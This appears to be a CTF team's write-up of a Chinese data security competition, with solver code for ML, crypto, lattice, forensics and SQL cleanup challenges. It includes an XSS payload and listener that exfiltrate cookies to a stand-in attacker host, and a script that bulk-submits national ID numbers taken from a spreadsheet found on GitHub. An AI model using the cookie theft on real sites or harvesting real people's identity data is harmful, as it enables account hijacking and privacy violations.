To thoroughly study and implement the spirit of the 20th CPC National Congress, discover data security talent, advance the development and application of data security technology, strengthen China's data security governance capabilities, and safeguard the building of Digital China, 中国电子信息产业发展研究院, 中国信息通信研究院, 国家工业信息安全发展研究中心, and 中国软件评测中心 (工业和信息化部软件与集成电路促进中心) jointly organized the 2nd Data Security Competition and 1st "数信杯" Data Security Competition. The event is a major component of the Data Security Industry Summit Forum.
training
Since this is an AI challenge, we switched machines partway through, though it was still finished on Kaggle in the end, so the screen-recording file doesn't cover this challenge. We took first blood on it, so there's no question of plagiarism anyway...
# Import Data Science Libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import tensorflow as tf
from sklearn.model_selection import train_test_split
from PIL import Image
# Tensorflow Libraries
from tensorflow import keras
from tensorflow.keras import layers,models
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.layers import Dense, Dropout
from tensorflow.keras.callbacks import Callback, EarlyStopping,ModelCheckpoint
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.applications import MobileNetV2
from tensorflow.keras import Model
from tensorflow.keras.layers.experimental import preprocessing
# System libraries
from pathlib import Path
import os.path
# Metrics
from sklearn.metrics import classification_report, confusion_matrix
import itertools
#!ls /
#!wget https://raw.githubusercontent.com/mrdbourke/tensorflow-deep-learning/main/extras/helper_functions.py
#!cp /kaggle/input/help-dataset/helper_functions.py ./helper_functions.py
# Import series of helper functions for our notebook
from helper_functions import create_tensorboard_callback, plot_loss_curves, unzip_data, compare_historys, walk_through_dir, pred_and_plot
BATCH_SIZE = 32
IMAGE_SIZE = (224, 224)
# Walk through each directory
dataset = "../input/train-data/"
walk_through_dir(dataset)
image_dir = Path(dataset)
# Get filepaths and labels
filepaths = list(image_dir.glob(r'**/*.JPG')) + list(image_dir.glob(r'**/*.jpg')) + list(image_dir.glob(r'**/*.png'))
labels = list(map(lambda x: os.path.split(os.path.split(x)[0])[1], filepaths))
filepaths = pd.Series(filepaths, name='Filepath').astype(str)
labels = pd.Series(labels, name='Label')
# Concatenate filepaths and labels
image_df = pd.concat([filepaths, labels], axis=1)
import matplotlib.image as mpimg
# Display 16 pictures from the dataset with their labels
random_index = np.random.randint(0, len(image_df), 16)
fig, axes = plt.subplots(nrows=4, ncols=4, figsize=(10, 10),
                         subplot_kw={'xticks': [], 'yticks': []})
for i, ax in enumerate(axes.flat):
    image = Image.open(image_df.Filepath[random_index[i]])
    ax.imshow(image)
    ax.set_title(image_df.Label[random_index[i]])
plt.tight_layout()
plt.show()
# Separate into train and test data (the test split is effectively a single image;
# nearly everything is kept for training)
train_df, test_df = train_test_split(image_df, test_size=1e-7, shuffle=True, random_state=42)
train_generator = ImageDataGenerator(
    preprocessing_function=tf.keras.applications.mobilenet_v2.preprocess_input,
    validation_split=1e-7  # likewise, keep virtually everything in the training subset
)
test_generator = ImageDataGenerator(
    preprocessing_function=tf.keras.applications.mobilenet_v2.preprocess_input
)
# Build the train / validation / test iterators
train_images = train_generator.flow_from_dataframe(
    dataframe=train_df,
    x_col='Filepath',
    y_col='Label',
    target_size=(224, 224),
    color_mode='rgb',
    class_mode='categorical',
    batch_size=32,
    shuffle=True,
    seed=42,
    subset='training'
)
val_images = train_generator.flow_from_dataframe(
    dataframe=train_df,
    x_col='Filepath',
    y_col='Label',
    target_size=(224, 224),
    color_mode='rgb',
    class_mode='categorical',
    batch_size=32,
    shuffle=True,
    seed=42,
    subset='validation'
)
test_images = test_generator.flow_from_dataframe(
    dataframe=test_df,
    x_col='Filepath',
    y_col='Label',
    target_size=(224, 224),
    color_mode='rgb',
    class_mode='categorical',
    batch_size=32,
    shuffle=False
)
# Load the pretrained model
pretrained_model = tf.keras.applications.MobileNetV2(
    input_shape=(224, 224, 3),
    include_top=False,
    weights=None,
    pooling='avg'
)
pretrained_model.load_weights('/kaggle/input/mobilenet-v2/mobilenet_v2_weights_tf_dim_ordering_tf_kernels_1.0_224_no_top.h5')
pretrained_model.trainable = False
# Create checkpoint callback
checkpoint_path = "fires_classification_model_checkpoint"
checkpoint_callback = ModelCheckpoint(checkpoint_path,
                                      save_weights_only=True,
                                      monitor="val_accuracy",
                                      save_best_only=True)
# Set up EarlyStopping to halt training if the model's val_loss doesn't improve for 5 epochs
early_stopping = EarlyStopping(monitor="val_loss",          # watch the val loss metric
                               patience=5,                  # allow 5 stagnant epochs before stopping
                               restore_best_weights=True)
inputs = pretrained_model.input
x = Dense(256, activation='relu')(pretrained_model.output)
x = Dropout(0.2)(x)
x = Dense(256, activation='relu')(x)
x = Dropout(0.2)(x)
outputs = Dense(2, activation='softmax')(x)
model = Model(inputs=inputs, outputs=outputs)
model.compile(
    optimizer=Adam(0.0001),
    loss='categorical_crossentropy',
    metrics=['accuracy']
)
history = model.fit(
    train_images,
    steps_per_epoch=len(train_images),
    validation_data=val_images,
    validation_steps=len(val_images),
    epochs=15
)
model.save('model_new.h5')
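To get predictions out of the trained model, something like the following works (a minimal sketch; test_images and model come from above, and the class order follows train_images.class_indices):

preds = model.predict(test_images)
pred_ids = np.argmax(preds, axis=1)
id_to_label = {v: k for k, v in train_images.class_indices.items()}
print([id_to_label[i] for i in pred_ids[:10]])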
SU7
We suspect the challenge author got lazy here; this one looked familiar. We had first blood on the original back then, too:
pwnhub 2022 Winter, 飞驰人生
Drawing on that earlier experience, we went straight to the throttle and door data.
The values we found didn't match at first; it turned out the last throttle value had been quietly altered...
A rather exasperating challenge, nowhere near the quality of the first encounter.
messagebox
Just an XSS cookie-stealing challenge. Payload:
Exfiltrate the cookie and you're done.
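The payload itself isn't reproduced in this writeup, but the usual setup is a script that ships document.cookie to a host you control. A minimal sketch (the host evil.example:8000 is hypothetical): inject something like <script>new Image().src='http://evil.example:8000/?c='+document.cookie</script>, then catch the hit with a tiny Python listener:

from http.server import BaseHTTPRequestHandler, HTTPServer

class Catcher(BaseHTTPRequestHandler):
    def do_GET(self):
        # the stolen cookie arrives in the query string
        print('cookie hit:', self.path)
        self.send_response(200)
        self.end_headers()

HTTPServer(('0.0.0.0', 8000), Catcher).serve_forever()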
RWZIP
Some data is missing.
Patch it back in.
Only the letters are reversed.
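If "only the letters are reversed" means non-letter characters keep their positions (our reading of the note above), undoing it is a few lines of Python; a sketch with a hypothetical helper:

def unreverse_letters(s: str) -> str:
    # collect the letters in reverse order, then drop them back into the letter slots
    letters = iter([c for c in s if c.isalpha()][::-1])
    return ''.join(next(letters) if c.isalpha() else c for c in s)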
幻方 (Magic Square)
A 3x3 magic square has only eight possible arrangements, so lock in one of them and retry a few times until the server's instance matches.
import hashlib
import random
import string

# candidate alphabet for the 4-char proof-of-work prefix (assumed; adjust to the challenge's charset)
charset = string.ascii_letters + string.digits
while True:
    rand_str = ''.join(random.choice(charset) for _ in range(4)) + 'CyhQp8lsgzYjTNUD'
    if hashlib.sha256(rand_str.encode()).hexdigest() == '11f8af166cc28e24b4646cc300436f4d4bf8e11b2327379331a3eca2d5fc7c0c':
        print(rand_str[:4])
        break
'''
[2, 7, 6, 9, 5, 1, 4, 3, 8]
[2, 9, 4, 7, 5, 3, 6, 1, 8]
[4, 3, 8, 9, 5, 1, 2, 7, 6]
[4, 9, 2, 3, 5, 7, 8, 1, 6]
[6, 1, 8, 7, 5, 3, 2, 9, 4]
[6, 7, 2, 1, 5, 9, 8, 3, 4]
[8, 1, 6, 3, 5, 7, 4, 9, 2]
[8, 3, 4, 1, 5, 9, 6, 7, 2]
4 3 8
9 5 1
2 7 6
'''
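For reference, the eight arrangements listed above are easy to regenerate; a quick brute-force sketch over all permutations of 1..9:

import itertools

# every row, column and diagonal of a 3x3 magic square over 1..9 sums to 15
for p in itertools.permutations(range(1, 10)):
    rows = [p[0:3], p[3:6], p[6:9]]
    cols = list(zip(*rows))
    diags = [(p[0], p[4], p[8]), (p[2], p[4], p[6])]
    if all(sum(line) == 15 for line in rows + cols + diags):
        print(list(p))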
RWIO
pyc
Decompiling the pyc online gives the source. A flag.enc file is provided, and the decryption logic is very simple; we grilled the AI into writing the exploit:
import random
import os
def decrypt_data(encrypted_data):
    random.seed(114514)
    decrypted_data = bytearray()
    for byte in encrypted_data:
        key = random.randint(0, 128)
        decrypted_data.append(byte ^ key)
    return decrypted_data

def read_file(file_path, mode='rb'):
    with open(file_path, mode) as file:
        return file.read()

def write_file(file_path, data, mode='wb'):
    with open(file_path, mode) as file:
        file.write(data)

def decrypt_file(encrypted_file_path, output_file_path):
    encrypted_data = read_file(encrypted_file_path)
    decrypted_data = decrypt_data(encrypted_data)
    write_file(output_file_path, decrypted_data)
if __name__ == "__main__":
    encrypted_file_path = './flag.enc'
    output_file_path = './flag_decrypted.txt'
    decrypt_file(encrypted_file_path, output_file_path)
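Since XOR with the same keystream is its own inverse, this decryptor is byte-for-byte the routine the challenge presumably used to encrypt: reseeding random with 114514 regenerates the identical sequence of randint(0, 128) keys.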
USBhacker
MWatch
Heart Rate shows up repeatedly, and combined with the challenge description that is clearly the target, so we examined only the Heart Rate records.
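A quick way to isolate those records from an exported dump of the capture (a sketch; the filename mwatch_export.txt is hypothetical):

# grep-style pass over a text/JSON export of the capture
with open('mwatch_export.txt', encoding='utf-8', errors='ignore') as f:
    for line in f:
        if 'Heart Rate' in line:
            print(line.rstrip())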
BabyRSA
from Crypto.Util.number import *
r = 287040188443069778047400125757341514899
e = 96001
c = 7385580281056276781497978538020227181009675544528771975750499295104237912389096731847571930273208146186326124578668216163319969575131936068848815308298035625
m = ZZ(pow(c, inverse_mod(e, r**4 - r**3), r**4))
print(long_to_bytes(m))
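For context: the modulus is n = r^4, so the group order is phi(r^4) = r^3·(r − 1) = r^4 − r^3, which is exactly the value inverted above. The same decryption works in plain Python without Sage (a sketch reusing r, e, c from the script above):

from Crypto.Util.number import long_to_bytes, inverse

phi = r**4 - r**3    # Euler's totient of n = r**4
d = inverse(e, phi)  # private exponent
print(long_to_bytes(pow(c, d, r**4)))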
Backpack
from Crypto.Util.number import *
from math import log2
C = 231282844744
M = [27811518167, 19889199464, 19122558731, 19966624823, 25670001067, 30690729665, 23936341812, 31011714749, 30524482330, 21737374993, 17530717152, 19140841231, 33846825616, 17334386491, 28867755886, 29354544582, 21758322019, 27261411361, 31465376167, 26145493792, 27075307455, 33514052206, 25397635665, 21970496142, 30801229475, 22405695620, 18486900933, 27071880304, 17919853256, 18072328152, 21108080920]
L = block_matrix([
    [1, matrix(ZZ, M).T],
    [0, C]
]).LLL()
for row in L:
    if row[-1] == 0 and len(set(row)) == 2:
        ans = [abs(i) for i in row[:-1]]
        ans = int(''.join(map(str, ans)), 2)
        print(long_to_bytes(ans))
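This is the standard subset-sum lattice: each identity row tracks whether an item is taken, and the last column cancels to zero exactly for the combination that hits C. As a sanity check, the recovered 0/1 vector should reproduce the target sum; a small sketch (verify is a hypothetical helper, reusing M and C):

def verify(bits, M, C):
    # the 0/1 assignment must reproduce the target sum exactly
    return len(bits) == len(M) and sum(b * m for b, m in zip(bits, M)) == C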
定向数据采集 (Targeted Data Collection)
Found an identity-information sheet on GitHub:
https://github.com/xuxin3101/-excel-/blob/master/%E6%95%B4%E7%90%86%E5%90%8E%E7%9A%84%E8%BA%AB%E4%BB%BD%E8%AF%81.xlsx
import openpyxl
import requests
import time
from urllib.parse import urlencode
burp0_url = "http://121.40.65.125:23328/submit"
def separate_name_and_id(input_file, output_file):
    wb = openpyxl.load_workbook(input_file)
    ws = wb.active
    for row in ws.iter_rows(min_row=1, max_col=1, max_row=ws.max_row, values_only=True):
        if row[0]:
            name, id_number = row[0].split('----')  # extract the name and ID number
            print(name, id_number)
            age = 2024 - int(id_number[6:10])
            if int(id_number[10:12]) > 4:  # born after April: no birthday yet this year
                age -= 1
            sexx = u"男"
            burp0_json = {"address": "asd", "age": str(age), "ethnicity": "as", "experience": "1", "idcard": id_number, "name": "a", "phonenumber": "12312331233", "position": "as", "sex": sexx}
            sexx2 = u"女"
            burp0_json1 = {"address": "asd", "age": str(age), "ethnicity": "as", "experience": "1", "idcard": id_number, "name": "a", "phonenumber": "12312331233", "position": "as", "sex": sexx2}
            try:
                # submit both sexes; the server accepts whichever is correct
                r0 = requests.post(burp0_url, json=burp0_json)
                r1 = requests.post(burp0_url, json=burp0_json1)
                print(r0.request.body)
                print(r0.text, r1.text)
                # time.sleep(0.5)
            except requests.exceptions.RequestException:
                print("err")
                # time.sleep(2)
    # ws.append([name.strip(), id_number.strip()])
    # wb.save(output_file)
    wb.close()
if __name__ == "__main__":
    input_file = "data1.xlsx"
    output_file = "separated_data.xlsx"  # not actually used; abandoned
    separate_name_and_id(input_file, output_file)
The code is ugly, but it runs, and that's enough (lol).
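As an aside, the double submission for sex is avoidable: in an 18-digit mainland ID number, the 17th digit encodes it (odd = male, even = female), so it can be derived directly:

def sex_from_id(id_number: str) -> str:
    # 17th digit (index 16): odd means male, even means female
    return u"男" if int(id_number[16]) % 2 else u"女"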
weather
Review bundle.js.
Then visit the endpoint with the right parameters and guess from there.
mysql数据清理 (MySQL Data Cleanup)
First, delete the target users' data:
DELETE FROM ShoppingCart WHERE user_id in ("5142","2123","1169","8623");
DELETE FROM TransactionHistory WHERE user_id in ("5142","2123","1169","8623");
DELETE FROM UserLog WHERE user_id in ("5142","2123","1169","8623");
DELETE FROM Wallet WHERE user_id in ("5142","2123","1169","8623");
DELETE FROM User WHERE id in ("5142","2123","1169","8623");
Then rebuild the tables to clear out the residual data left behind by the deletes:
alter table User engine = innodb;
alter table UserLog engine = innodb;
alter table TransactionHistory engine = innodb;
alter table ShoppingCart engine = innodb;
alter table Orders engine = innodb;
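The ALTER TABLE ... ENGINE = innodb statements force a full table rebuild, which is what actually discards the deleted rows' residue from the tablespace. On InnoDB, OPTIMIZE TABLE achieves the same thing (MySQL maps it to a rebuild plus analyze):

OPTIMIZE TABLE User, UserLog, TransactionHistory, ShoppingCart, Orders;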
Original article first published on the WeChat official account N0wayBack: 西区-第二届数据安全大赛暨首届“数信杯”数据安全大赛 WP